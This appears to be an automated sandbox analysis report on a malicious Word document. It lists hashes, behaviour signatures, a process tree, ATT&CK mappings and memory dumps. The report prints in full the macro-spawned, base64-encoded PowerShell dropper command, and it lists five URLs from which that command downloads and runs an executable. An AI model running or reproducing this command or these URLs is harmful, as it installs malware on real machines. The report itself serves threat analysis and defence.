Overview

overview

10

Static

static

8

5728eee655...8b.doc

windows7_x64

10

5728eee655...8b.doc

windows10-2004_x64

4

Analysis

  • max time kernel
    118s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 06:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5728eee65538ea548f875a51d731267536d0f7234add1d2d4eb1c2282220b28b.doc

  • Size

    136KB

  • MD5

    1c3e971b11c75df46d5e0e28050eb876

  • SHA1

    7b38f2b3317139733aa4a8f2e4eef86e9c1f4de7

  • SHA256

    5728eee65538ea548f875a51d731267536d0f7234add1d2d4eb1c2282220b28b

  • SHA512

    067f76924e47bcabd339a57a6c7345274a3275db79dfdd4e5761c15213c11a317f96474921681eec36d6113c44b31f00c74aae35d58393397315f8743aeb7f7c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://everythingtobetrendy.com/wp-content/mqbFvBGlJW/
exe.dropper

http://sankaraca.com/wp-admin/aVBdZeOGj/
exe.dropper

http://www.palazzobentivoglio.org/softaculous/ZLXVNXrCC/
exe.dropper

http://aiostory.com/wp-admin/gxNAbyQwxr/
exe.dropper

https://antivirusassists.com/wp-admin/nKsXsNLff/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5728eee65538ea548f875a51d731267536d0f7234add1d2d4eb1c2282220b28b.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABRAEIAagBvADYAUgBwAD0AJwBFAGEAZABxAHIAVQAnADsAJABNAEQANgAwADYAZgAgAD0AIAAnADkANgA5ACcAOwAkAGoAYQAyAFoAXwA0AD0AJwBwAHcAQgB1AEUARgA3ACcAOwAkAEMAbwB2AGkARABHAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE0ARAA2ADAANgBmACsAJwAuAGUAeABlACcAOwAkAEwASQB6AEoAWABGAFQANwA9ACcAQQBjAGkAdAA4ADcAdAAnADsAJABRADEAagBuAGoAUAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQAYAAuAFcAZQBgAEIAYwBMAGAAaQBFAE4AdAA7ACQAUQBjAEYANABiAHoAPQAnAGgAdAB0AHAAcwA6AC8ALwBlAHYAZQByAHkAdABoAGkAbgBnAHQAbwBiAGUAdAByAGUAbgBkAHkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBtAHEAYgBGAHYAQgBHAGwASgBXAC8AQABoAHQAdABwADoALwAvAHMAYQBuAGsAYQByAGEAYwBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBhAFYAQgBkAFoAZQBPAEcAagAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAYQBsAGEAegB6AG8AYgBlAG4AdABpAHYAbwBnAGwAaQBvAC4AbwByAGcALwBzAG8AZgB0AGEAYwB1AGwAbwB1AHMALwBaAEwAWABWAE4AWAByAEMAQwAvAEAAaAB0AHQAcAA6AC8ALwBhAGkAbwBzAHQAbwByAHkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGcAeABOAEEAYgB5AFEAdwB4AHIALwBAAGgAdAB0AHAAcwA6AC8ALwBhAG4AdABpAHYAaQByAHUAcwBhAHMAcwBpAHMAdABzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAEsAcwBYAHMATgBMAGYAZgAvACcALgBTAHAATABJAHQAKAAnAEAAJwApADsAJABiADYAQwBvAHIAUABpAD0AJwBVAEEAVgBoAFoAMwAnADsAZgBvAHIAZQBhAGMAaAAoACQAdwB0AF8AawB1AG8ASQBQACAAaQBuACAAJABRAGMARgA0AGIAegApAHsAdAByAHkAewAkAFEAMQBqAG4AagBQAC4ARABvAFcAbgBsAE8AQQBEAEYAaQBMAGUAKAAkAHcAdABfAGsAdQBvAEkAUAAsACAAJABDAG8AdgBpAEQARwBBACkAOwAkAE0AQwBUAFUAaQBkADkAUgA9ACcATgBFAEUAdwBXAFIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABDAG8AdgBpAEQARwBBACkALgBsAGUAbgBnAHQASAAgAC0AZwBlACAAMwAwADkANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAYQByAHQAKAAkAEMAbwB2AGkARABHAEEAKQA7ACQASgBpAEkANQA0AE8ASgBpAD0AJwBZAEQAcQBvAEcAcgAnADsAYgByAGUAYQBrADsAJABEAF8AYwBFAFcAdQBDAD0AJwBFAGsAbwBFADAAcAA4ADYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABiAEcAWgA2ADkAPQAnAEkAawBiADkASABxAHcAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1184

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/744-58-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1184-72-0x0000000002950000-0x0000000002952000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1184-76-0x000000000295B000-0x000000000297A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1184-73-0x000007FEF3590000-0x000007FEF40ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1184-75-0x0000000002954000-0x0000000002957000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1184-74-0x0000000002952000-0x0000000002954000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1592-62-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-59-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-54-0x0000000072EB1000-0x0000000072EB4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1592-63-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-65-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-66-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-67-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-68-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-61-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-60-0x0000000000430000-0x000000000050F000-memory.dmp
      Filesize

      892KB

      Download
    • memory/1592-57-0x00000000766D1000-0x00000000766D3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1592-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1592-55-0x0000000070931000-0x0000000070933000-memory.dmp
      Filesize

      8KB

      Download